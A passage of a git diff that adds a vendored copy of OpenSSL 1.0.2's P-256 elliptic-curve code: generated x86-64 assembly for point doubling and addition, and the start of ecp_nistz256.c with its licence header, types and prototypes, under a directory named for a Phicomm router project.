+	orq	%r10,%r13
+	shlq	$63,%rcx
+	movq	%r12,0(%rdi)
+	shrq	$1,%r15
+	movq	%r13,8(%rdi)
+	shlq	$63,%r9
+	orq	%rcx,%r14
+	orq	%r9,%r15
+	movq	%r14,16(%rdi)
+	movq	%r15,24(%rdi)
+	movq	64(%rsp),%rdx
+	leaq	64(%rsp),%rbx
+	movq	0+32(%rsp),%r9
+	movq	8+32(%rsp),%r10
+	leaq	-128+32(%rsp),%rsi
+	movq	16+32(%rsp),%r11
+	movq	24+32(%rsp),%r12
+	leaq	32(%rsp),%rdi
+	call	__ecp_nistz256_mul_montx
+
+	leaq	128(%rsp),%rdi
+	call	__ecp_nistz256_mul_by_2x
+
+	leaq	32(%rsp),%rbx
+	leaq	32(%rsp),%rdi
+	call	__ecp_nistz256_add_tox
+
+	movq	96(%rsp),%rdx
+	leaq	96(%rsp),%rbx
+	movq	0+0(%rsp),%r9
+	movq	8+0(%rsp),%r10
+	leaq	-128+0(%rsp),%rsi
+	movq	16+0(%rsp),%r11
+	movq	24+0(%rsp),%r12
+	leaq	0(%rsp),%rdi
+	call	__ecp_nistz256_mul_montx
+
+	leaq	128(%rsp),%rdi
+	call	__ecp_nistz256_mul_by_2x
+
+	movq	0+32(%rsp),%rdx
+	movq	8+32(%rsp),%r14
+	leaq	-128+32(%rsp),%rsi
+	movq	16+32(%rsp),%r15
+	movq	24+32(%rsp),%r8
+.byte	102,72,15,126,199
+	call	__ecp_nistz256_sqr_montx
+
+	leaq	128(%rsp),%rbx
+	movq	%r14,%r8
+	movq	%r15,%r9
+	movq	%rsi,%r14
+	movq	%rbp,%r15
+	call	__ecp_nistz256_sub_fromx
+
+	movq	0+0(%rsp),%rax
+	movq	0+8(%rsp),%rbp
+	movq	0+16(%rsp),%rcx
+	movq	0+24(%rsp),%r10
+	leaq	0(%rsp),%rdi
+	call	__ecp_nistz256_subx
+
+	movq	32(%rsp),%rdx
+	leaq	32(%rsp),%rbx
+	movq	%r12,%r14
+	xorl	%ecx,%ecx
+	movq	%r12,0+0(%rsp)
+	movq	%r13,%r10
+	movq	%r13,0+8(%rsp)
+	cmovzq	%r8,%r11
+	movq	%r8,0+16(%rsp)
+	leaq	0-128(%rsp),%rsi
+	cmovzq	%r9,%r12
+	movq	%r9,0+24(%rsp)
+	movq	%r14,%r9
+	leaq	0(%rsp),%rdi
+	call	__ecp_nistz256_mul_montx
+
+.byte	102,72,15,126,203
+.byte	102,72,15,126,207
+	call	__ecp_nistz256_sub_fromx
+
+	addq	$160+8,%rsp
+	popq	%r15
+	popq	%r14
+	popq	%r13
+	popq	%r12
+	popq	%rbx
+	popq	%rbp
+	.byte	0xf3,0xc3
+.size	ecp_nistz256_point_doublex,.-ecp_nistz256_point_doublex
+.type	ecp_nistz256_point_addx,@function
+.align	32
+ecp_nistz256_point_addx:
+.Lpoint_addx:
+	pushq	%rbp
+	pushq	%rbx
+	pushq	%r12
+	pushq	%r13
+	pushq	%r14
+	pushq	%r15
+	subq	$576+8,%rsp
+
+	movdqu	0(%rsi),%xmm0
+	movdqu	16(%rsi),%xmm1
+	movdqu	32(%rsi),%xmm2
+	movdqu	48(%rsi),%xmm3
+	movdqu	64(%rsi),%xmm4
+	movdqu	80(%rsi),%xmm5
+	movq	%rsi,%rbx
+	movq	%rdx,%rsi
+	movdqa	%xmm0,384(%rsp)
+	movdqa	%xmm1,384+16(%rsp)
+	por	%xmm0,%xmm1
+	movdqa	%xmm2,416(%rsp)
+	movdqa	%xmm3,416+16(%rsp)
+	por	%xmm2,%xmm3
+	movdqa	%xmm4,448(%rsp)
+	movdqa	%xmm5,448+16(%rsp)
+	por	%xmm1,%xmm3
+
+	movdqu	0(%rsi),%xmm0
+	pshufd	$177,%xmm3,%xmm5
+	movdqu	16(%rsi),%xmm1
+	movdqu	32(%rsi),%xmm2
+	por	%xmm3,%xmm5
+	movdqu	48(%rsi),%xmm3
+	movq	64+0(%rsi),%rdx
+	movq	64+8(%rsi),%r14
+	movq	64+16(%rsi),%r15
+	movq	64+24(%rsi),%r8
+	movdqa	%xmm0,480(%rsp)
+	pshufd	$30,%xmm5,%xmm4
+	movdqa	%xmm1,480+16(%rsp)
+	por	%xmm0,%xmm1
+.byte	102,72,15,110,199
+	movdqa	%xmm2,512(%rsp)
+	movdqa	%xmm3,512+16(%rsp)
+	por	%xmm2,%xmm3
+	por	%xmm4,%xmm5
+	pxor	%xmm4,%xmm4
+	por	%xmm1,%xmm3
+
+	leaq	64-128(%rsi),%rsi
+	movq	%rdx,544+0(%rsp)
+	movq	%r14,544+8(%rsp)
+	movq	%r15,544+16(%rsp)
+	movq	%r8,544+24(%rsp)
+	leaq	96(%rsp),%rdi
+	call	__ecp_nistz256_sqr_montx
+
+	pcmpeqd	%xmm4,%xmm5
+	pshufd	$177,%xmm3,%xmm4
+	por	%xmm3,%xmm4
+	pshufd	$0,%xmm5,%xmm5
+	pshufd	$30,%xmm4,%xmm3
+	por	%xmm3,%xmm4
+	pxor	%xmm3,%xmm3
+	pcmpeqd	%xmm3,%xmm4
+	pshufd	$0,%xmm4,%xmm4
+	movq	64+0(%rbx),%rdx
+	movq	64+8(%rbx),%r14
+	movq	64+16(%rbx),%r15
+	movq	64+24(%rbx),%r8
+
+	leaq	64-128(%rbx),%rsi
+	leaq	32(%rsp),%rdi
+	call	__ecp_nistz256_sqr_montx
+
+	movq	544(%rsp),%rdx
+	leaq	544(%rsp),%rbx
+	movq	0+96(%rsp),%r9
+	movq	8+96(%rsp),%r10
+	leaq	-128+96(%rsp),%rsi
+	movq	16+96(%rsp),%r11
+	movq	24+96(%rsp),%r12
+	leaq	224(%rsp),%rdi
+	call	__ecp_nistz256_mul_montx
+
+	movq	448(%rsp),%rdx
+	leaq	448(%rsp),%rbx
+	movq	0+32(%rsp),%r9
+	movq	8+32(%rsp),%r10
+	leaq	-128+32(%rsp),%rsi
+	movq	16+32(%rsp),%r11
+	movq	24+32(%rsp),%r12
+	leaq	256(%rsp),%rdi
+	call	__ecp_nistz256_mul_montx
+
+	movq	416(%rsp),%rdx
+	leaq	416(%rsp),%rbx
+	movq	0+224(%rsp),%r9
+	movq	8+224(%rsp),%r10
+	leaq	-128+224(%rsp),%rsi
+	movq	16+224(%rsp),%r11
+	movq	24+224(%rsp),%r12
+	leaq	224(%rsp),%rdi
+	call	__ecp_nistz256_mul_montx
+
+	movq	512(%rsp),%rdx
+	leaq	512(%rsp),%rbx
+	movq	0+256(%rsp),%r9
+	movq	8+256(%rsp),%r10
+	leaq	-128+256(%rsp),%rsi
+	movq	16+256(%rsp),%r11
+	movq	24+256(%rsp),%r12
+	leaq	256(%rsp),%rdi
+	call	__ecp_nistz256_mul_montx
+
+	leaq	224(%rsp),%rbx
+	leaq	64(%rsp),%rdi
+	call	__ecp_nistz256_sub_fromx
+
+	orq	%r13,%r12
+	movdqa	%xmm4,%xmm2
+	orq	%r8,%r12
+	orq	%r9,%r12
+	por	%xmm5,%xmm2
+.byte	102,73,15,110,220
+
+	movq	384(%rsp),%rdx
+	leaq	384(%rsp),%rbx
+	movq	0+96(%rsp),%r9
+	movq	8+96(%rsp),%r10
+	leaq	-128+96(%rsp),%rsi
+	movq	16+96(%rsp),%r11
+	movq	24+96(%rsp),%r12
+	leaq	160(%rsp),%rdi
+	call	__ecp_nistz256_mul_montx
+
+	movq	480(%rsp),%rdx
+	leaq	480(%rsp),%rbx
+	movq	0+32(%rsp),%r9
+	movq	8+32(%rsp),%r10
+	leaq	-128+32(%rsp),%rsi
+	movq	16+32(%rsp),%r11
+	movq	24+32(%rsp),%r12
+	leaq	192(%rsp),%rdi
+	call	__ecp_nistz256_mul_montx
+
+	leaq	160(%rsp),%rbx
+	leaq	0(%rsp),%rdi
+	call	__ecp_nistz256_sub_fromx
+
+	orq	%r13,%r12
+	orq	%r8,%r12
+	orq	%r9,%r12
+
+.byte	0x3e
+	jnz	.Ladd_proceedx
+.byte	102,73,15,126,208
+.byte	102,73,15,126,217
+	testq	%r8,%r8
+	jnz	.Ladd_proceedx
+	testq	%r9,%r9
+	jz	.Ladd_proceedx
+
+.byte	102,72,15,126,199
+	pxor	%xmm0,%xmm0
+	movdqu	%xmm0,0(%rdi)
+	movdqu	%xmm0,16(%rdi)
+	movdqu	%xmm0,32(%rdi)
+	movdqu	%xmm0,48(%rdi)
+	movdqu	%xmm0,64(%rdi)
+	movdqu	%xmm0,80(%rdi)
+	jmp	.Ladd_donex
+
+.align	32
+.Ladd_proceedx:
+	movq	0+64(%rsp),%rdx
+	movq	8+64(%rsp),%r14
+	leaq	-128+64(%rsp),%rsi
+	movq	16+64(%rsp),%r15
+	movq	24+64(%rsp),%r8
+	leaq	96(%rsp),%rdi
+	call	__ecp_nistz256_sqr_montx
+
+	movq	448(%rsp),%rdx
+	leaq	448(%rsp),%rbx
+	movq	0+0(%rsp),%r9
+	movq	8+0(%rsp),%r10
+	leaq	-128+0(%rsp),%rsi
+	movq	16+0(%rsp),%r11
+	movq	24+0(%rsp),%r12
+	leaq	352(%rsp),%rdi
+	call	__ecp_nistz256_mul_montx
+
+	movq	0+0(%rsp),%rdx
+	movq	8+0(%rsp),%r14
+	leaq	-128+0(%rsp),%rsi
+	movq	16+0(%rsp),%r15
+	movq	24+0(%rsp),%r8
+	leaq	32(%rsp),%rdi
+	call	__ecp_nistz256_sqr_montx
+
+	movq	544(%rsp),%rdx
+	leaq	544(%rsp),%rbx
+	movq	0+352(%rsp),%r9
+	movq	8+352(%rsp),%r10
+	leaq	-128+352(%rsp),%rsi
+	movq	16+352(%rsp),%r11
+	movq	24+352(%rsp),%r12
+	leaq	352(%rsp),%rdi
+	call	__ecp_nistz256_mul_montx
+
+	movq	0(%rsp),%rdx
+	leaq	0(%rsp),%rbx
+	movq	0+32(%rsp),%r9
+	movq	8+32(%rsp),%r10
+	leaq	-128+32(%rsp),%rsi
+	movq	16+32(%rsp),%r11
+	movq	24+32(%rsp),%r12
+	leaq	128(%rsp),%rdi
+	call	__ecp_nistz256_mul_montx
+
+	movq	160(%rsp),%rdx
+	leaq	160(%rsp),%rbx
+	movq	0+32(%rsp),%r9
+	movq	8+32(%rsp),%r10
+	leaq	-128+32(%rsp),%rsi
+	movq	16+32(%rsp),%r11
+	movq	24+32(%rsp),%r12
+	leaq	192(%rsp),%rdi
+	call	__ecp_nistz256_mul_montx
+
+
+
+
+	addq	%r12,%r12
+	leaq	96(%rsp),%rsi
+	adcq	%r13,%r13
+	movq	%r12,%rax
+	adcq	%r8,%r8
+	adcq	%r9,%r9
+	movq	%r13,%rbp
+	sbbq	%r11,%r11
+
+	subq	$-1,%r12
+	movq	%r8,%rcx
+	sbbq	%r14,%r13
+	sbbq	$0,%r8
+	movq	%r9,%r10
+	sbbq	%r15,%r9
+	testq	%r11,%r11
+
+	cmovzq	%rax,%r12
+	movq	0(%rsi),%rax
+	cmovzq	%rbp,%r13
+	movq	8(%rsi),%rbp
+	cmovzq	%rcx,%r8
+	movq	16(%rsi),%rcx
+	cmovzq	%r10,%r9
+	movq	24(%rsi),%r10
+
+	call	__ecp_nistz256_subx
+
+	leaq	128(%rsp),%rbx
+	leaq	288(%rsp),%rdi
+	call	__ecp_nistz256_sub_fromx
+
+	movq	192+0(%rsp),%rax
+	movq	192+8(%rsp),%rbp
+	movq	192+16(%rsp),%rcx
+	movq	192+24(%rsp),%r10
+	leaq	320(%rsp),%rdi
+
+	call	__ecp_nistz256_subx
+
+	movq	%r12,0(%rdi)
+	movq	%r13,8(%rdi)
+	movq	%r8,16(%rdi)
+	movq	%r9,24(%rdi)
+	movq	128(%rsp),%rdx
+	leaq	128(%rsp),%rbx
+	movq	0+224(%rsp),%r9
+	movq	8+224(%rsp),%r10
+	leaq	-128+224(%rsp),%rsi
+	movq	16+224(%rsp),%r11
+	movq	24+224(%rsp),%r12
+	leaq	256(%rsp),%rdi
+	call	__ecp_nistz256_mul_montx
+
+	movq	320(%rsp),%rdx
+	leaq	320(%rsp),%rbx
+	movq	0+64(%rsp),%r9
+	movq	8+64(%rsp),%r10
+	leaq	-128+64(%rsp),%rsi
+	movq	16+64(%rsp),%r11
+	movq	24+64(%rsp),%r12
+	leaq	320(%rsp),%rdi
+	call	__ecp_nistz256_mul_montx
+
+	leaq	256(%rsp),%rbx
+	leaq	320(%rsp),%rdi
+	call	__ecp_nistz256_sub_fromx
+
+.byte	102,72,15,126,199
+
+	movdqa	%xmm5,%xmm0
+	movdqa	%xmm5,%xmm1
+	pandn	352(%rsp),%xmm0
+	movdqa	%xmm5,%xmm2
+	pandn	352+16(%rsp),%xmm1
+	movdqa	%xmm5,%xmm3
+	pand	544(%rsp),%xmm2
+	pand	544+16(%rsp),%xmm3
+	por	%xmm0,%xmm2
+	por	%xmm1,%xmm3
+
+	movdqa	%xmm4,%xmm0
+	movdqa	%xmm4,%xmm1
+	pandn	%xmm2,%xmm0
+	movdqa	%xmm4,%xmm2
+	pandn	%xmm3,%xmm1
+	movdqa	%xmm4,%xmm3
+	pand	448(%rsp),%xmm2
+	pand	448+16(%rsp),%xmm3
+	por	%xmm0,%xmm2
+	por	%xmm1,%xmm3
+	movdqu	%xmm2,64(%rdi)
+	movdqu	%xmm3,80(%rdi)
+
+	movdqa	%xmm5,%xmm0
+	movdqa	%xmm5,%xmm1
+	pandn	288(%rsp),%xmm0
+	movdqa	%xmm5,%xmm2
+	pandn	288+16(%rsp),%xmm1
+	movdqa	%xmm5,%xmm3
+	pand	480(%rsp),%xmm2
+	pand	480+16(%rsp),%xmm3
+	por	%xmm0,%xmm2
+	por	%xmm1,%xmm3
+
+	movdqa	%xmm4,%xmm0
+	movdqa	%xmm4,%xmm1
+	pandn	%xmm2,%xmm0
+	movdqa	%xmm4,%xmm2
+	pandn	%xmm3,%xmm1
+	movdqa	%xmm4,%xmm3
+	pand	384(%rsp),%xmm2
+	pand	384+16(%rsp),%xmm3
+	por	%xmm0,%xmm2
+	por	%xmm1,%xmm3
+	movdqu	%xmm2,0(%rdi)
+	movdqu	%xmm3,16(%rdi)
+
+	movdqa	%xmm5,%xmm0
+	movdqa	%xmm5,%xmm1
+	pandn	320(%rsp),%xmm0
+	movdqa	%xmm5,%xmm2
+	pandn	320+16(%rsp),%xmm1
+	movdqa	%xmm5,%xmm3
+	pand	512(%rsp),%xmm2
+	pand	512+16(%rsp),%xmm3
+	por	%xmm0,%xmm2
+	por	%xmm1,%xmm3
+
+	movdqa	%xmm4,%xmm0
+	movdqa	%xmm4,%xmm1
+	pandn	%xmm2,%xmm0
+	movdqa	%xmm4,%xmm2
+	pandn	%xmm3,%xmm1
+	movdqa	%xmm4,%xmm3
+	pand	416(%rsp),%xmm2
+	pand	416+16(%rsp),%xmm3
+	por	%xmm0,%xmm2
+	por	%xmm1,%xmm3
+	movdqu	%xmm2,32(%rdi)
+	movdqu	%xmm3,48(%rdi)
+
+.Ladd_donex:
+	addq	$576+8,%rsp
+	popq	%r15
+	popq	%r14
+	popq	%r13
+	popq	%r12
+	popq	%rbx
+	popq	%rbp
+	.byte	0xf3,0xc3
+.size	ecp_nistz256_point_addx,.-ecp_nistz256_point_addx
+.type	ecp_nistz256_point_add_affinex,@function
+.align	32
+ecp_nistz256_point_add_affinex:
+.Lpoint_add_affinex:
+	pushq	%rbp
+	pushq	%rbx
+	pushq	%r12
+	pushq	%r13
+	pushq	%r14
+	pushq	%r15
+	subq	$480+8,%rsp
+
+	movdqu	0(%rsi),%xmm0
+	movq	%rdx,%rbx
+	movdqu	16(%rsi),%xmm1
+	movdqu	32(%rsi),%xmm2
+	movdqu	48(%rsi),%xmm3
+	movdqu	64(%rsi),%xmm4
+	movdqu	80(%rsi),%xmm5
+	movq	64+0(%rsi),%rdx
+	movq	64+8(%rsi),%r14
+	movq	64+16(%rsi),%r15
+	movq	64+24(%rsi),%r8
+	movdqa	%xmm0,320(%rsp)
+	movdqa	%xmm1,320+16(%rsp)
+	por	%xmm0,%xmm1
+	movdqa	%xmm2,352(%rsp)
+	movdqa	%xmm3,352+16(%rsp)
+	por	%xmm2,%xmm3
+	movdqa	%xmm4,384(%rsp)
+	movdqa	%xmm5,384+16(%rsp)
+	por	%xmm1,%xmm3
+
+	movdqu	0(%rbx),%xmm0
+	pshufd	$177,%xmm3,%xmm5
+	movdqu	16(%rbx),%xmm1
+	movdqu	32(%rbx),%xmm2
+	por	%xmm3,%xmm5
+	movdqu	48(%rbx),%xmm3
+	movdqa	%xmm0,416(%rsp)
+	pshufd	$30,%xmm5,%xmm4
+	movdqa	%xmm1,416+16(%rsp)
+	por	%xmm0,%xmm1
+.byte	102,72,15,110,199
+	movdqa	%xmm2,448(%rsp)
+	movdqa	%xmm3,448+16(%rsp)
+	por	%xmm2,%xmm3
+	por	%xmm4,%xmm5
+	pxor	%xmm4,%xmm4
+	por	%xmm1,%xmm3
+
+	leaq	64-128(%rsi),%rsi
+	leaq	32(%rsp),%rdi
+	call	__ecp_nistz256_sqr_montx
+
+	pcmpeqd	%xmm4,%xmm5
+	pshufd	$177,%xmm3,%xmm4
+	movq	0(%rbx),%rdx
+
+	movq	%r12,%r9
+	por	%xmm3,%xmm4
+	pshufd	$0,%xmm5,%xmm5
+	pshufd	$30,%xmm4,%xmm3
+	movq	%r13,%r10
+	por	%xmm3,%xmm4
+	pxor	%xmm3,%xmm3
+	movq	%r14,%r11
+	pcmpeqd	%xmm3,%xmm4
+	pshufd	$0,%xmm4,%xmm4
+
+	leaq	32-128(%rsp),%rsi
+	movq	%r15,%r12
+	leaq	0(%rsp),%rdi
+	call	__ecp_nistz256_mul_montx
+
+	leaq	320(%rsp),%rbx
+	leaq	64(%rsp),%rdi
+	call	__ecp_nistz256_sub_fromx
+
+	movq	384(%rsp),%rdx
+	leaq	384(%rsp),%rbx
+	movq	0+32(%rsp),%r9
+	movq	8+32(%rsp),%r10
+	leaq	-128+32(%rsp),%rsi
+	movq	16+32(%rsp),%r11
+	movq	24+32(%rsp),%r12
+	leaq	32(%rsp),%rdi
+	call	__ecp_nistz256_mul_montx
+
+	movq	384(%rsp),%rdx
+	leaq	384(%rsp),%rbx
+	movq	0+64(%rsp),%r9
+	movq	8+64(%rsp),%r10
+	leaq	-128+64(%rsp),%rsi
+	movq	16+64(%rsp),%r11
+	movq	24+64(%rsp),%r12
+	leaq	288(%rsp),%rdi
+	call	__ecp_nistz256_mul_montx
+
+	movq	448(%rsp),%rdx
+	leaq	448(%rsp),%rbx
+	movq	0+32(%rsp),%r9
+	movq	8+32(%rsp),%r10
+	leaq	-128+32(%rsp),%rsi
+	movq	16+32(%rsp),%r11
+	movq	24+32(%rsp),%r12
+	leaq	32(%rsp),%rdi
+	call	__ecp_nistz256_mul_montx
+
+	leaq	352(%rsp),%rbx
+	leaq	96(%rsp),%rdi
+	call	__ecp_nistz256_sub_fromx
+
+	movq	0+64(%rsp),%rdx
+	movq	8+64(%rsp),%r14
+	leaq	-128+64(%rsp),%rsi
+	movq	16+64(%rsp),%r15
+	movq	24+64(%rsp),%r8
+	leaq	128(%rsp),%rdi
+	call	__ecp_nistz256_sqr_montx
+
+	movq	0+96(%rsp),%rdx
+	movq	8+96(%rsp),%r14
+	leaq	-128+96(%rsp),%rsi
+	movq	16+96(%rsp),%r15
+	movq	24+96(%rsp),%r8
+	leaq	192(%rsp),%rdi
+	call	__ecp_nistz256_sqr_montx
+
+	movq	128(%rsp),%rdx
+	leaq	128(%rsp),%rbx
+	movq	0+64(%rsp),%r9
+	movq	8+64(%rsp),%r10
+	leaq	-128+64(%rsp),%rsi
+	movq	16+64(%rsp),%r11
+	movq	24+64(%rsp),%r12
+	leaq	160(%rsp),%rdi
+	call	__ecp_nistz256_mul_montx
+
+	movq	320(%rsp),%rdx
+	leaq	320(%rsp),%rbx
+	movq	0+128(%rsp),%r9
+	movq	8+128(%rsp),%r10
+	leaq	-128+128(%rsp),%rsi
+	movq	16+128(%rsp),%r11
+	movq	24+128(%rsp),%r12
+	leaq	0(%rsp),%rdi
+	call	__ecp_nistz256_mul_montx
+
+
+
+
+	addq	%r12,%r12
+	leaq	192(%rsp),%rsi
+	adcq	%r13,%r13
+	movq	%r12,%rax
+	adcq	%r8,%r8
+	adcq	%r9,%r9
+	movq	%r13,%rbp
+	sbbq	%r11,%r11
+
+	subq	$-1,%r12
+	movq	%r8,%rcx
+	sbbq	%r14,%r13
+	sbbq	$0,%r8
+	movq	%r9,%r10
+	sbbq	%r15,%r9
+	testq	%r11,%r11
+
+	cmovzq	%rax,%r12
+	movq	0(%rsi),%rax
+	cmovzq	%rbp,%r13
+	movq	8(%rsi),%rbp
+	cmovzq	%rcx,%r8
+	movq	16(%rsi),%rcx
+	cmovzq	%r10,%r9
+	movq	24(%rsi),%r10
+
+	call	__ecp_nistz256_subx
+
+	leaq	160(%rsp),%rbx
+	leaq	224(%rsp),%rdi
+	call	__ecp_nistz256_sub_fromx
+
+	movq	0+0(%rsp),%rax
+	movq	0+8(%rsp),%rbp
+	movq	0+16(%rsp),%rcx
+	movq	0+24(%rsp),%r10
+	leaq	64(%rsp),%rdi
+
+	call	__ecp_nistz256_subx
+
+	movq	%r12,0(%rdi)
+	movq	%r13,8(%rdi)
+	movq	%r8,16(%rdi)
+	movq	%r9,24(%rdi)
+	movq	352(%rsp),%rdx
+	leaq	352(%rsp),%rbx
+	movq	0+160(%rsp),%r9
+	movq	8+160(%rsp),%r10
+	leaq	-128+160(%rsp),%rsi
+	movq	16+160(%rsp),%r11
+	movq	24+160(%rsp),%r12
+	leaq	32(%rsp),%rdi
+	call	__ecp_nistz256_mul_montx
+
+	movq	96(%rsp),%rdx
+	leaq	96(%rsp),%rbx
+	movq	0+64(%rsp),%r9
+	movq	8+64(%rsp),%r10
+	leaq	-128+64(%rsp),%rsi
+	movq	16+64(%rsp),%r11
+	movq	24+64(%rsp),%r12
+	leaq	64(%rsp),%rdi
+	call	__ecp_nistz256_mul_montx
+
+	leaq	32(%rsp),%rbx
+	leaq	256(%rsp),%rdi
+	call	__ecp_nistz256_sub_fromx
+
+.byte	102,72,15,126,199
+
+	movdqa	%xmm5,%xmm0
+	movdqa	%xmm5,%xmm1
+	pandn	288(%rsp),%xmm0
+	movdqa	%xmm5,%xmm2
+	pandn	288+16(%rsp),%xmm1
+	movdqa	%xmm5,%xmm3
+	pand	.LONE_mont(%rip),%xmm2
+	pand	.LONE_mont+16(%rip),%xmm3
+	por	%xmm0,%xmm2
+	por	%xmm1,%xmm3
+
+	movdqa	%xmm4,%xmm0
+	movdqa	%xmm4,%xmm1
+	pandn	%xmm2,%xmm0
+	movdqa	%xmm4,%xmm2
+	pandn	%xmm3,%xmm1
+	movdqa	%xmm4,%xmm3
+	pand	384(%rsp),%xmm2
+	pand	384+16(%rsp),%xmm3
+	por	%xmm0,%xmm2
+	por	%xmm1,%xmm3
+	movdqu	%xmm2,64(%rdi)
+	movdqu	%xmm3,80(%rdi)
+
+	movdqa	%xmm5,%xmm0
+	movdqa	%xmm5,%xmm1
+	pandn	224(%rsp),%xmm0
+	movdqa	%xmm5,%xmm2
+	pandn	224+16(%rsp),%xmm1
+	movdqa	%xmm5,%xmm3
+	pand	416(%rsp),%xmm2
+	pand	416+16(%rsp),%xmm3
+	por	%xmm0,%xmm2
+	por	%xmm1,%xmm3
+
+	movdqa	%xmm4,%xmm0
+	movdqa	%xmm4,%xmm1
+	pandn	%xmm2,%xmm0
+	movdqa	%xmm4,%xmm2
+	pandn	%xmm3,%xmm1
+	movdqa	%xmm4,%xmm3
+	pand	320(%rsp),%xmm2
+	pand	320+16(%rsp),%xmm3
+	por	%xmm0,%xmm2
+	por	%xmm1,%xmm3
+	movdqu	%xmm2,0(%rdi)
+	movdqu	%xmm3,16(%rdi)
+
+	movdqa	%xmm5,%xmm0
+	movdqa	%xmm5,%xmm1
+	pandn	256(%rsp),%xmm0
+	movdqa	%xmm5,%xmm2
+	pandn	256+16(%rsp),%xmm1
+	movdqa	%xmm5,%xmm3
+	pand	448(%rsp),%xmm2
+	pand	448+16(%rsp),%xmm3
+	por	%xmm0,%xmm2
+	por	%xmm1,%xmm3
+
+	movdqa	%xmm4,%xmm0
+	movdqa	%xmm4,%xmm1
+	pandn	%xmm2,%xmm0
+	movdqa	%xmm4,%xmm2
+	pandn	%xmm3,%xmm1
+	movdqa	%xmm4,%xmm3
+	pand	352(%rsp),%xmm2
+	pand	352+16(%rsp),%xmm3
+	por	%xmm0,%xmm2
+	por	%xmm1,%xmm3
+	movdqu	%xmm2,32(%rdi)
+	movdqu	%xmm3,48(%rdi)
+
+	addq	$480+8,%rsp
+	popq	%r15
+	popq	%r14
+	popq	%r13
+	popq	%r12
+	popq	%rbx
+	popq	%rbp
+	.byte	0xf3,0xc3
+.size	ecp_nistz256_point_add_affinex,.-ecp_nistz256_point_add_affinex
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ecp_nistz256.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ecp_nistz256.c
new file mode 100644
index 0000000..2cd6599
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ecp_nistz256.c
@@ -0,0 +1,1486 @@
+/******************************************************************************
+ *                                                                            *
+ * Copyright 2014 Intel Corporation                                           *
+ *                                                                            *
+ * Licensed under the Apache License, Version 2.0 (the "License");            *
+ * you may not use this file except in compliance with the License.           *
+ * You may obtain a copy of the License at                                    *
+ *                                                                            *
+ *    http://www.apache.org/licenses/LICENSE-2.0                              *
+ *                                                                            *
+ * Unless required by applicable law or agreed to in writing, software        *
+ * distributed under the License is distributed on an "AS IS" BASIS,          *
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.   *
+ * See the License for the specific language governing permissions and        *
+ * limitations under the License.                                             *
+ *                                                                            *
+ ******************************************************************************
+ *                                                                            *
+ * Developers and authors:                                                    *
+ * Shay Gueron (1, 2), and Vlad Krasnov (1)                                   *
+ * (1) Intel Corporation, Israel Development Center                           *
+ * (2) University of Haifa                                                    *
+ * Reference:                                                                 *
+ * S.Gueron and V.Krasnov, "Fast Prime Field Elliptic Curve Cryptography with *
+ *                          256 Bit Primes"                                   *
+ *                                                                            *
+ ******************************************************************************/
+
+#include <string.h>
+
+#include <openssl/bn.h>
+#include <openssl/err.h>
+#include <openssl/ec.h>
+#include "cryptlib.h"
+
+#include "ec_lcl.h"
+
+#if BN_BITS2 != 64
+# define TOBN(hi,lo)    lo,hi
+#else
+# define TOBN(hi,lo)    ((BN_ULONG)hi<<32|lo)
+#endif
+
+#if defined(__GNUC__)
+# define ALIGN32        __attribute((aligned(32)))
+#elif defined(_MSC_VER)
+# define ALIGN32        __declspec(align(32))
+#else
+# define ALIGN32
+#endif
+
+#define ALIGNPTR(p,N)   ((unsigned char *)p+N-(size_t)p%N)
+#define P256_LIMBS      (256/BN_BITS2)
+
+typedef unsigned short u16;
+
+typedef struct {
+    BN_ULONG X[P256_LIMBS];
+    BN_ULONG Y[P256_LIMBS];
+    BN_ULONG Z[P256_LIMBS];
+} P256_POINT;
+
+typedef struct {
+    BN_ULONG X[P256_LIMBS];
+    BN_ULONG Y[P256_LIMBS];
+} P256_POINT_AFFINE;
+
+typedef P256_POINT_AFFINE PRECOMP256_ROW[64];
+
+/* structure for precomputed multiples of the generator */
+typedef struct ec_pre_comp_st {
+    const EC_GROUP *group;      /* Parent EC_GROUP object */
+    size_t w;                   /* Window size */
+    /*
+     * Constant time access to the X and Y coordinates of the pre-computed,
+     * generator multiplies, in the Montgomery domain. Pre-calculated
+     * multiplies are stored in affine form.
+     */
+    PRECOMP256_ROW *precomp;
+    void *precomp_storage;
+    int references;
+} EC_PRE_COMP;
+
+/* Functions implemented in assembly */
+/* Modular mul by 2: res = 2*a mod P */
+void ecp_nistz256_mul_by_2(BN_ULONG res[P256_LIMBS],
+                           const BN_ULONG a[P256_LIMBS]);
+/* Modular div by 2: res = a/2 mod P */
+void ecp_nistz256_div_by_2(BN_ULONG res[P256_LIMBS],
+                           const BN_ULONG a[P256_LIMBS]);
+/* Modular mul by 3: res = 3*a mod P */
+void ecp_nistz256_mul_by_3(BN_ULONG res[P256_LIMBS],
+                           const BN_ULONG a[P256_LIMBS]);
+/* Modular add: res = a+b mod P   */
+void ecp_nistz256_add(BN_ULONG res[P256_LIMBS],
+                      const BN_ULONG a[P256_LIMBS],
+                      const BN_ULONG b[P256_LIMBS]);
+/* Modular sub: res = a-b mod P   */
+void ecp_nistz256_sub(BN_ULONG res[P256_LIMBS],
+                      const BN_ULONG a[P256_LIMBS],
+                      const BN_ULONG b[P256_LIMBS]);
+/* Modular neg: res = -a mod P    */
+void ecp_nistz256_neg(BN_ULONG res[P256_LIMBS], const BN_ULONG a[P256_LIMBS]);
+/* Montgomery mul: res = a*b*2^-256 mod P */
+void ecp_nistz256_mul_mont(BN_ULONG res[P256_LIMBS],
+                           const BN_ULONG a[P256_LIMBS],
+                           const BN_ULONG b[P256_LIMBS]);
+/* Montgomery sqr: res = a*a*2^-256 mod P */
+void ecp_nistz256_sqr_mont(BN_ULONG res[P256_LIMBS],
+                           const BN_ULONG a[P256_LIMBS]);
+/* Convert a number from Montgomery domain, by multiplying with 1 */
+void ecp_nistz256_from_mont(BN_ULONG res[P256_LIMBS],
+                            const BN_ULONG in[P256_LIMBS]);
+/* Convert a number to Montgomery domain, by multiplying with 2^512 mod P*/
+void ecp_nistz256_to_mont(BN_ULONG res[P256_LIMBS],
+                          const BN_ULONG in[P256_LIMBS]);
+/* Functions that perform constant time access to the precomputed tables */
+void ecp_nistz256_select_w5(P256_POINT * val,
+                            const P256_POINT * in_t, int index);
